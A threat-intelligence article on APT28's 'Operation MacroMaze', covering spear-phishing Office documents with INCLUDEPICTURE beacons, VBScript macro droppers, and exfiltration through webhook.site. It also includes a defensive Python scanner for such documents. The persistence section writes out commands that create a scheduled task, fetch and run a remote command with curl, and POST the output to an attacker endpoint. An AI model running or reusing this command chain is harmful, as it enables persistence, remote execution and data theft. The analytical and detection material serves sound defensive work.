APT28 Targeted European Entities Using Webhook-Based Macro Malware
Source: The Hacker News
The Russia‑linked state‑sponsored threat actor tracked as APT28 has been attributed to a new campaign targeting specific entities in Western and Central Europe.
The activity, observed by S2 Grupo’s LAB52 threat‑intelligence team between September 2025 and January 2026, is codenamed Operation MacroMaze. According to LAB52, “the campaign relies on basic tooling and the exploitation of legitimate services for infrastructure and data exfiltration.”

Operation MacroMaze Overview
- Delivery vector: Spear‑phishing emails with malicious Microsoft Office documents.
- Core technique: Documents embed an INCLUDEPICTURE field in their XML that points to a webhook.site URL hosting a JPG image. Opening the document triggers a request to that URL, acting as a tracking‑pixel beacon.
- Purpose of the beacon: Allows the attacker to confirm that the document was opened and to begin the next stage of the infection.
Technical Details
Spear‑phishing Delivery
The malicious documents are crafted to look legitimate while containing the INCLUDEPICTURE element that references a remote image. When the document is opened, Microsoft Office automatically fetches the image, generating an outbound HTTP request to the attacker‑controlled webhook.site endpoint.
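As an added example (not code from the LAB52 report or the article), the following Python scanner inspects a .docx for INCLUDEPICTURE field codes that reference a remote URL, flags watchlisted hosts such as webhook.site, and notes whether the file also carries a VBA project; the sample document, the URL and the watchlist are constructed for this demonstration.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
INSTR_TAG = f"{{{W_NS}}}instrText"
# Constructed watchlist: the only host the article names as attacker infrastructure.
WATCHLIST_HOSTS = ("webhook.site",)

def find_remote_includepicture(docx_bytes: bytes) -> list[dict]:
    """Return every INCLUDEPICTURE field in word/document.xml that points at an
    http(s) URL, tagging watchlisted hosts and whether a VBA project is present."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        has_macro = "word/vbaProject.bin" in names
        if "word/document.xml" not in names:
            return findings
        root = ET.fromstring(zf.read("word/document.xml"))
    # Field codes may be split across several w:instrText runs, so join them first.
    instr = "".join(e.text or "" for e in root.iter(INSTR_TAG))
    for m in re.finditer(r'INCLUDEPICTURE\s+"?(https?://[^"\s\\]+)', instr, re.I):
        url = m.group(1)
        host = re.sub(r"^https?://", "", url).split("/")[0].lower()
        findings.append({"url": url, "host": host,
                         "watchlisted": host.endswith(WATCHLIST_HOSTS),
                         "has_macro": has_macro})
    return findings

def build_sample_docx(url: str) -> bytes:
    """Constructed minimal .docx containing one INCLUDEPICTURE field (not a real sample)."""
    document = (f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
                '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
                f'<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "{url}" \\d </w:instrText></w:r>'
                '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
                '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
                '</w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document)
    return buf.getvalue()

if __name__ == "__main__":
    # EXAMPLE-ID is a placeholder path, not an indicator from the report.
    for hit in find_remote_includepicture(build_sample_docx("https://webhook.site/EXAMPLE-ID/pixel.jpg")):
        print(hit)
```

Any remote INCLUDEPICTURE is worth reviewing, since Office fetches it on open; a watchlisted host combined with an embedded VBA project matches the pattern described for this campaign.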
Macro Droppers
LAB52 identified multiple documents with slightly varied macros (late September 2025 – January 2026). All macros share the same overall logic but show an evolution in evasion techniques:
- Older versions: Execute a “headless” browser instance to avoid UI prompts.
- Newer versions: Use keyboard simulation (SendKeys) to bypass security dialogs.
The macro launches a Visual Basic Script (VBScript) that:
- Executes a CMD file to create a scheduled‑task persistence mechanism.
- Starts a batch script that renders a small Base64‑encoded HTML payload in Microsoft Edge (headless mode).
- Retrieves a command from the webhook.site endpoint, executes it, captures the output, and exfiltrates the data to a second webhook.site URL as an HTML file.
A second batch‑script variant avoids headless execution; instead, it moves the Edge window off‑screen and terminates any other Edge processes to maintain a controlled environment.
Command Execution and Persistence
The persistence chain relies on standard Windows tools:
schtasks /create /tn "UpdateTask" /tr "C:\Path\to\malicious.bat" /sc onlogon
The batch script then:
rem Render Base64‑encoded HTML in Edge (headless)
start msedge --headless --disable-gpu "data:text/html;base64,{{payload}}"
rem Retrieve command from webhook.site
curl -s https://webhook.site/xxxxxx/command > cmd.txt
call cmd.txt > output.txt
rem Exfiltrate output
curl -X POST -F "file=@output.txt" https://webhook.site/xxxxxx/exfil
Browser‑Based Exfiltration
When the rendered HTML file is displayed in Microsoft Edge, it automatically submits a form, sending the captured command output to the attacker’s webhook.site endpoint without any user interaction. This technique leverages standard HTML form submission, minimizing on‑disk artifacts and evading many endpoint‑detection solutions.

Conclusion
Operation MacroMaze demonstrates that simplicity can be powerful. APT28 strings together basic tools—batch files, tiny VBS launchers, and simple HTML—to achieve a stealthy, multi‑stage attack:
- Delivery: Spear‑phishing with beaconing documents.
- Persistence: Scheduled tasks created via native Windows utilities.
- Execution: Headless or off‑screen browser sessions to run commands.
- Exfiltration: Standard HTML form submissions to widely used webhook.site services.
By outsourcing both payload delivery and data exfiltration to legitimate, high‑trust services, the campaign reduces its own footprint and complicates detection.